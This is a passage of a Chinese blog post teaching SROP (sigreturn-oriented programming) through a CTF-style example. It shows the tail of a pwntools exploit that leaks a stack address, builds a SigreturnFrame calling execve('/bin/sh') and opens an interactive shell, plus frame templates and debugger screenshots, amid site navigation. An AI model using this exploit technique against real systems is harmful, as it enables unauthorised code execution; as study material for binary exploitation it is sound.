data-num="38"></td><td><pre></pre></td></tr><tr><td data-num="39"></td><td><pre>of <span class="token operator">=</span> <span class="token number">0x7fffffffde28</span> <span class="token operator">-</span> <span class="token number">0x7fffffffdd10</span></pre></td></tr><tr><td data-num="40"></td><td><pre><span class="token string">'of 计算binsh在栈的偏移'</span></pre></td></tr><tr><td data-num="41"></td><td><pre>l_stack <span class="token operator">=</span> lic<span class="token punctuation">(</span><span class="token string">'\x7f'</span><span class="token punctuation">)</span> </pre></td></tr><tr><td data-num="42"></td><td><pre>binsh <span class="token operator">=</span> l_stack <span class="token operator">-</span> of</pre></td></tr><tr><td data-num="43"></td><td><pre><span class="token keyword">print</span><span class="token punctuation">(</span><span class="token builtin">hex</span><span class="token punctuation">(</span>l_stack<span class="token punctuation">)</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="44"></td><td><pre><span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">'binsh_addr=======>'</span> <span class="token operator">+</span> <span class="token builtin">str</span><span class="token punctuation">(</span><span class="token builtin">hex</span><span class="token punctuation">(</span>binsh<span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="45"></td><td><pre></pre></td></tr><tr><td data-num="46"></td><td><pre>syscall <span class="token operator">=</span> <span class="token number">0x400501</span></pre></td></tr><tr><td data-num="47"></td><td><pre><span class="token comment"># 00000000004004DA                 mov     rax, 0Fh</span></pre></td></tr><tr><td data-num="48"></td><td><pre>sigreturn  <span class="token operator">=</span> <span class="token number">0x4004DA</span></pre></td></tr><tr><td data-num="49"></td><td><pre></pre></td></tr><tr><td data-num="50"></td><td><pre>sigframe <span class="token operator">=</span> SigreturnFrame<span class="token punctuation">(</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="51"></td><td><pre>sigframe<span class="token punctuation">.</span>rax <span class="token operator">=</span> constants<span class="token punctuation">.</span>SYS_execve</pre></td></tr><tr><td data-num="52"></td><td><pre>sigframe<span class="token punctuation">.</span>rdi <span class="token operator">=</span> binsh </pre></td></tr><tr><td data-num="53"></td><td><pre>sigframe<span class="token punctuation">.</span>rsi <span class="token operator">=</span> <span class="token number">0x0</span></pre></td></tr><tr><td data-num="54"></td><td><pre>sigframe<span class="token punctuation">.</span>rdx <span class="token operator">=</span> <span class="token number">0x0</span></pre></td></tr><tr><td data-num="55"></td><td><pre>sigframe<span class="token punctuation">.</span>rip <span class="token operator">=</span> syscall</pre></td></tr><tr><td data-num="56"></td><td><pre></pre></td></tr><tr><td data-num="57"></td><td><pre>pl2 <span class="token operator">=</span> <span class="token string">b'/bin/sh\x00'</span> <span class="token operator">+</span> p64<span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span> <span class="token operator">+</span> p64<span class="token punctuation">(</span>sigreturn<span class="token punctuation">)</span> <span class="token operator">+</span> p64<span class="token punctuation">(</span>syscall<span class="token punctuation">)</span> <span class="token operator">+</span> <span class="token builtin">bytes</span><span class="token punctuation">(</span>sigframe<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="58"></td><td><pre><span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">'传输sigframe之前======>'</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="59"></td><td><pre><span class="token comment"># pause()</span></pre></td></tr><tr><td data-num="60"></td><td><pre>sl<span class="token punctuation">(</span>pl2<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="61"></td><td><pre><span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">'传输sigframe之后======>'</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="62"></td><td><pre><span class="token comment"># pause()</span></pre></td></tr><tr><td data-num="63"></td><td><pre>r<span class="token punctuation">.</span>interactive<span class="token punctuation">(</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="64"></td><td><pre><span class="token triple-quoted-string string">'''</pre></td></tr><tr><td data-num="65"></td><td><pre>需要设置架构</pre></td></tr><tr><td data-num="66"></td><td><pre>execve:</pre></td></tr><tr><td data-num="67"></td><td><pre>	sigframe = SigreturnFrame()</pre></td></tr><tr><td data-num="68"></td><td><pre>	sigframe.rax = constants.SYS_execve</pre></td></tr><tr><td data-num="69"></td><td><pre>	sigframe.rdi = binsh </pre></td></tr><tr><td data-num="70"></td><td><pre>	sigframe.rsi = 0x0</pre></td></tr><tr><td data-num="71"></td><td><pre>	sigframe.rip = syscall</pre></td></tr><tr><td data-num="72"></td><td><pre></pre></td></tr><tr><td data-num="73"></td><td><pre>read:</pre></td></tr><tr><td data-num="74"></td><td><pre>	frame =  SigreturnFrame()</pre></td></tr><tr><td data-num="75"></td><td><pre>	frame.rax = constants.SYS_read</pre></td></tr><tr><td data-num="76"></td><td><pre>	frame.rdi = 0</pre></td></tr><tr><td data-num="77"></td><td><pre>	frame.rsi = stack_addr</pre></td></tr><tr><td data-num="78"></td><td><pre>	frame.rdx = 0x400</pre></td></tr><tr><td data-num="79"></td><td><pre>	frame.rsp = stack_addr</pre></td></tr><tr><td data-num="80"></td><td><pre>	frame.rip = syscall_addr</pre></td></tr><tr><td data-num="81"></td><td><pre></pre></td></tr><tr><td data-num="82"></td><td><pre>x64 more information:</pre></td></tr><tr><td data-num="83"></td><td><pre>	http://blog.rchapman.org/posts/Linux_System_Call_Table_for_x86_64/</pre></td></tr><tr><td data-num="84"></td><td><pre></pre></td></tr><tr><td data-num="85"></td><td><pre>'''</span></pre></td></tr></table></figure><figure class="highlight python"><figcaption data-lang="python"><span>n</span></figcaption><table><tr><td data-num="1"></td><td><pre>sigframe <span class="token operator">=</span> SigreturnFrame<span class="token punctuation">(</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="2"></td><td><pre>sigframe<span class="token punctuation">.</span>rax <span class="token operator">=</span> constants<span class="token punctuation">.</span>SYS_execve</pre></td></tr><tr><td data-num="3"></td><td><pre>sigframe<span class="token punctuation">.</span>rdi <span class="token operator">=</span> binsh </pre></td></tr><tr><td data-num="4"></td><td><pre>sigframe<span class="token punctuation">.</span>rsi <span class="token operator">=</span> <span class="token number">0x0</span></pre></td></tr><tr><td data-num="5"></td><td><pre>sigframe<span class="token punctuation">.</span>rdx <span class="token operator">=</span> <span class="token number">0x0</span></pre></td></tr><tr><td data-num="6"></td><td><pre>sigframe<span class="token punctuation">.</span>rip <span class="token operator">=</span> syscall</pre></td></tr><tr><td data-num="7"></td><td><pre></pre></td></tr><tr><td data-num="8"></td><td><pre>pl2 <span class="token operator">=</span> <span class="token string">b'/bin/sh\x00'</span> <span class="token operator">+</span> p64<span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span> <span class="token operator">+</span> p64<span class="token punctuation">(</span>sigreturn<span class="token punctuation">)</span> <span class="token operator">+</span> p64<span class="token punctuation">(</span>syscall<span class="token punctuation">)</span> <span class="token operator">+</span> <span class="token builtin">bytes</span><span class="token punctuation">(</span>sigfram）</pre></td></tr></table></figure><p>当传入 pl2 我们调试发现寄存器的变化</p>
<p>可见 srop 的攻击原理</p>
<p><img data-src="/img/srop/image-20230803224211151.png" alt=""></p>
<p><img data-src="/img/srop/image-20230803224917202.png" alt="image-20230803224917202"></p>
<p><img data-src="/img/srop/image-20230803224304825.png" alt="image-20230803224304825"></p>

      <div class="tags">
          <a href="/tags/rop/" rel="tag"><i class="ic i-tag"></i> rop</a>
          <a href="/tags/srop/" rel="tag"><i class="ic i-tag"></i> srop</a>
      </div>
  </div>

   <footer>

    <div class="meta">
  <span class="item">
    <span class="icon">
      <i class="ic i-calendar-check"></i>
    </span>
    <span class="text">更新于</span>
    <time title="修改时间：2023-08-05 11:16:29" itemprop="dateModified" datetime="2023-08-05T11:16:29+08:00">2023-08-05</time>
  </span>
  <span id="2023/08/03/srop/" class="item leancloud_visitors" data-flag-title="srop" title="阅读次数">
      <span class="icon">
        <i class="ic i-eye"></i>
      </span>
      <span class="text">阅读次数</span>
      <span class="leancloud-visitors-count"></span>
      <span class="text">次</span>
  </span>
</div>

      

<div id="copyright">
<ul>
  <li class="author">
    <strong>本文作者： </strong>yhuanhuan <i class="ic i-at"><em>@</em></i>
  </li>
  <li class="link">
    <strong>本文链接：</strong>
    <a href="https://yhuanhuan01.github.io/2023/08/03/srop/" title="srop">https://yhuanhuan01.github.io/2023/08/03/srop/</a>
  </li>
  <li class="license">
    <strong>版权声明： </strong>本站所有文章除特别声明外，均采用 <span class="exturl" data-url="aHR0cHM6Ly9jcmVhdGl2ZWNvbW1vbnMub3JnL2xpY2Vuc2VzL2J5LW5jLXNhLzQuMC96aC1DTg=="><i class="ic i-creative-commons"><em>(CC)</em></i>BY-NC-SA</span> 许可协议。转载请注明出处！
  </li>
</ul>
</div>

  </footer>

</article>

  </div>
  

<div class="post-nav">
    <div class="item left">
      

  <a href="/2023/08/03/csu/" itemprop="url" rel="prev" data-background-image="https:&#x2F;&#x2F;s2.loli.net&#x2F;2023&#x2F;08&#x2F;03&#x2F;3QaAkKnrb4hzo58.png" title="csu">
  <span class="type">上一篇</span>
  <span class="category"><i class="ic i-flag"></i> 技巧</span>
  <h3>csu</h3>
  </a>

    </div>
    <div class="item right">
      

  <a href="/2023/08/04/b-canary/" itemprop="url" rel="next" data-background-image="https:&#x2F;&#x2F;s2.loli.net&#x2F;2023&#x2F;08&#x2F;03&#x2F;xABdev7CEF4h3sR.png" title="b_canary">
  <span class="type">下一篇</span>
  <span class="category"><i class="ic i-flag"></i> 技巧</span>
  <h3>b_canary</h3>
  </a>

    </div>
</div>

  
  <div class="wrap" id="comments"></div>


        </div>
        <div id="sidebar">
          

<div class="inner">

  <div class="panels">
    <div class="inner">
      <div class="contents panel pjax" data-title="文章目录">
          <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#srop"><span class="toc-number">1.</span> <span class="toc-text"> srop</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#srop%E5%8E%9F%E7%90%86"><span class="toc-number">1.1.</span> <span class="toc-text"> srop 原理</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#signal-%E6%9C%BA%E5%88%B6"><span class="toc-number">1.1.1.</span> <span class="toc-text"> signal 机制 ¶</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%94%BB%E5%87%BB%E5%8E%9F%E7%90%86"><span class="toc-number">1.2.</span> <span class="toc-text"> 攻击原理</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%8E%B7%E5%8F%96-shell"><span class="toc-number">1.2.1.</span> <span class="toc-text"> 获取 shell</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#system-call-chains"><span class="toc-number">1.2.2.</span> <span class="toc-text"> system call chains</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%90%8E%E7%BB%AD"><span class="toc-number">1.2.3.</span> <span class="toc-text"> 后续 ¶</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%80%E9%81%93%E4%BE%8B%E9%A2%98"><span class="toc-number">1.3.</span> <span class="toc-text"> 一道例题</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%A3%80%E6%9F%A5"><span class="toc-number">1.3.1.</span> <span class="toc-text"> 检查</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#ida"><span class="toc-number">1.3.2.</span> <span class="toc-text"> IDA</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#exp"><span class="toc-number">1.3.3.</span> <span class="toc-text"> exp</span></a></li></ol></li></ol></li></ol>
      </div>
      <div class="related panel pjax" data-title="系列文章">
        <ul>
          <li><a href="/2023/08/03/csu/" rel="bookmark" title="csu">csu</a></li><li class="active"><a href="/2023/08/03/srop/" rel="bookmark" title="srop">srop</a></li><li><a href="/2023/08/04/b-canary/" rel="bookmark" title="b_canary">b_canary</a></li><li><a href="/2023/08/10/uaf/" rel="bookmark" title="uaf">uaf</a></li><li><a href="/2023/08/11/unlink/" rel="bookmark" title="unlink">unlink</a></li><li><a href="/2023/09/22/picture/new-pwn/" rel="bookmark" title="new_pwn">new_pwn</a></li><li><a href="/2023/09/22/new-pwn/" rel="bookmark" title="new_pwn">new_pwn</a></li>
        </ul>
      </div>
      <div class="overview panel" data-title="站点概览">
        <div class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <img class="image" itemprop="image" alt="yhuanhuan"
      data-src="/images/huanhuan.png">
  <p class="name" itemprop="name">yhuanhuan</p>
  <div class="description" itemprop="description">欢迎来到Huan的笔记空间~~~~~~🌸</div>
</div>

<nav class="state">
    <div class="item posts">
      <a href="/archives/">
        <span class="count">39</span>
        <span class="name">文章</span>
      </a>
    </div>
    <div class="item categories">
      <a href="/categories/">
        <span class="count">11</span>
        <span class="name">分类</span>
      </a>
    </div>
    <div class="item tags">
      <a href="/tags/">
        <span class="count">39</span>
        <span class="name">标签</span>
      </a>
    </div>
</nav>

<div class="social">
      <span class="exturl item github" data-url="aHR0cHM6Ly9naXRodWIuY29tL3lodWFuaHVhbjAx" title="https:&#x2F;&#x2F;github.com&#x2F;yhuanhuan01"><i class="ic i-github"></i></span>
      <span class="exturl item email" data-url="bWFpbHRvOjI4OTQ3NDIyMTRAcXEuY29t" title="mailto:2894742214@qq.com"><i class="ic i-envelope"></i></span>
</div>

<ul class="menu">
  
    
  <li class="item">
    <a href="/" rel="section"><i class="ic i-home"></i>首页</a>
  </li>

    
  <li class="item">
    <a href="/about/" rel="section"><i class="ic i-user"></i>关于</a>
  </li>

        
  <li class="item dropdown">
      <a href="javascript:void(0);"><i class="ic i-feather"></i>文章</a>
    <ul class="submenu">

        
  <li class="item">
    <a href="/archives/" rel="section"><i class="ic i-list-alt"></i>归档</a>
  </li>

        
  <li class="item">
    <a href="/categories/" rel="section"><i class="ic i-th"></i>分类</a>
  </li>

        
  <li class="item">
    <a href="/tags/" rel="section"><i class="ic i-tags"></i>标签</a>
  </li>

  </ul>
    
  <li class="item">
    <a href="/links/" rel="section"><i class="ic i-magic"></i>links</a>
  </li>


</ul>

      </div>
    </div>
  </div>

  <ul id="quick">
    <li class="prev pjax">
        <a href="/2023/08/03/csu/" rel="prev" title="上一篇"><i class="ic i-chevron-left"></i></a>
    </li>
    <li class="up"><i class="ic i-arrow-up"></i></li>
    <li class="down"><i class="ic i-arrow-down"></i></li>
    <li class="next pjax">
        <a href="/2023/08/04/b-canary/" rel="next" title="下一篇"><i class="ic i-chevron-right"></i></a>
    </li>
    <li class="percent"></li>
  </ul>
</div>


        </div>
        <div class="dimmer"></div>
      </div>
    </main>
    <footer id="footer">
      <div class="inner">
        <div class="widgets">
          
<div class="rpost pjax">
  <h2>随机文章</h2>
  <ul>
      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/%E5%A0%86%E6%94%BB%E5%87%BB/" title="分类于 堆攻击">堆攻击</a>
</div>

    <span><a href="/2024/07/22/tcache-stashing-unlink-attack(house-of-lore)/" title="tcache-stashing-unlink-attack(house-of-lore)">tcache-stashing-unlink-attack(house-of-lore)</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/Write-up/" title="分类于 Write_up">Write_up</a>
</div>

    <span><a href="/2023/08/13/Nep-wp/" title="Nep__wp">Nep__wp</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/PWN%E7%9A%84%E5%AD%A6%E4%B9%A0/" title="分类于 PWN的学习">PWN的学习</a>
<i class="ic i-angle-right"></i>
<a href="/categories/PWN%E7%9A%84%E5%AD%A6%E4%B9%A0/%E5%A4%8D%E7%8E%B0/" title="分类于 复现">复现</a>
</div>

    <span><a href="/2023/08/03/%E5%9B%BD%E8%B5%9B%E5%A4%8D%E7%8E%B0/" title="国赛复现">国赛复现</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/%E5%A0%86%E6%94%BB%E5%87%BB/" title="分类于 堆攻击">堆攻击</a>
</div>

    <span><a href="/2024/07/15/house-of-orange/" title="house-of-orange">house-of-orange</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/PWN%E7%9A%84%E5%AD%A6%E4%B9%A0/" title="分类于 PWN的学习">PWN的学习</a>
<i class="ic i-angle-right"></i>
<a href="/categories/PWN%E7%9A%84%E5%AD%A6%E4%B9%A0/%E7%9F%A5%E8%AF%86/" title="分类于 知识">知识</a>
</div>

    <span><a href="/2023/08/09/bins/" title="bins">bins</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/%E5%A0%86%E6%94%BB%E5%87%BB/" title="分类于 堆攻击">堆攻击</a>
</div>

    <span><a href="/2024/07/13/house-of-einherjar/" title="house-of-einherjar">house-of-einherjar</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/Write-up/" title="分类于 Write_up">Write_up</a>
</div>

    <span><a href="/2024/02/19/Sictf-round3-wp/" title="Sictf-round3-wp">Sictf-round3-wp</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/%E5%A0%86%E6%94%BB%E5%87%BB/" title="分类于 堆攻击">堆攻击</a>
</div>

    <span><a href="/2024/07/26/house-of-rabbit/" title="house-of-rabbit">house-of-rabbit</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/PWN%E7%9A%84%E5%AD%A6%E4%B9%A0/" title="分类于 PWN的学习">PWN的学习</a>
<i class="ic i-angle-right"></i>
<a href="/categories/PWN%E7%9A%84%E5%AD%A6%E4%B9%A0/%E6%8A%80%E5%B7%A7/" title="分类于 技巧">技巧</a>
</div>

    <span><a href="/2023/09/22/new-pwn/" title="new_pwn">new_pwn</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/%E5%A0%86%E6%94%BB%E5%87%BB/" title="分类于 堆攻击">堆攻击</a>
</div>

    <span><a href="/2024/07/29/%E5%A0%86%E4%B8%8A%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E5%88%A9%E7%94%A8/" title="堆上格式化字符利用">堆上格式化字符利用</a></span>
  </li>

  </ul>
</div>
<div>
  <h2>最新评论</h2>
  <ul class="leancloud-recent-comment"></ul>
</div>

        </div>
        <div class="status">
  <div class="copyright">
    
    &copy; 2010 – 
    <span itemprop="copyrightYear">2024</span>
    <span class="with-love">
      <i class="ic i-sakura rotate"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">yhuanhuan @ yhuanhuan</span>
  </div>
  <div class="count">
    <span class="post-meta-item-icon">
      <i class="ic i-chart-area"></i>
    </span>
    <span title="站点总字数">342k 字</span>

    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="ic i-coffee"></i>
    </span>
    <span title="站点阅读时长">5:11</span>
  </div>
  <div class="powered-by">
    基于 <span class="exturl" data-url="aHR0cHM6Ly9oZXhvLmlv">Hexo</span> & Theme.<span class="exturl" data-url="aHR0cHM6Ly9naXRodWIuY29tL2FtZWhpbWUvaGV4by10aGVtZS1zaG9rYQ==">Shoka</span>
  </div>
</div>

      </div>
    </footer>
  </div>
<script data-config type="text/javascript">
  var LOCAL = {
    path: '2023/08/03/srop/',
    favicon: {
      show: "（●´3｀●）やれやれだぜ",
      hide: "(´Д｀)大変だ！"
    },
    search : {
      placeholder: "文章搜索",
      empty: "关于 「 ${query} 」，什么也没搜到",
      stats: "${time} ms 内找到 ${hits} 条结果"
    },
    valine: true,fancybox: true,
    copyright: '复制成功，转载请遵守 <i class="ic i-creative-commons"></i>BY-NC-SA 协议。',
    ignores : [
      function(uri) {
        return uri.includes('#');
      },
      function(uri) {
        return new RegExp(LOCAL.path+"$").test(uri);
      }
    ]
  };
</script>

<script src="https://cdn.polyfill.io/v2/polyfill.js"></script>

<script src="//cdn.jsdelivr.net/combine/npm/pace-js@1.0.2/pace.min.js,npm/pjax@0.2.8/pjax.min.js,npm/whatwg-fetch@3.4.0/dist/fetch.umd.min.js,npm/animejs@3.2.0/lib/anime.min.js,npm/algoliasearch@4/dist/algoliasearch-lite.umd.js,npm/instantsearch.js@4/dist/instantsearch.production.min.js,npm/lozad@1/dist/lozad.min.js,npm/quicklink@2/dist/quicklink.umd.js"></script>

<script src="/js/app.js?v=0.2.5"></script>




<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":false,"model":{"jsonPath":"/live2dw/assets/koharu.model.json"},"display":{"position":"bottom","width":150,"height":300,"hOffset":-15,"vOffset":-15},"mobile":{"show":true},"react":{"opacity":0.7},"log":false});</script></body>
</html>
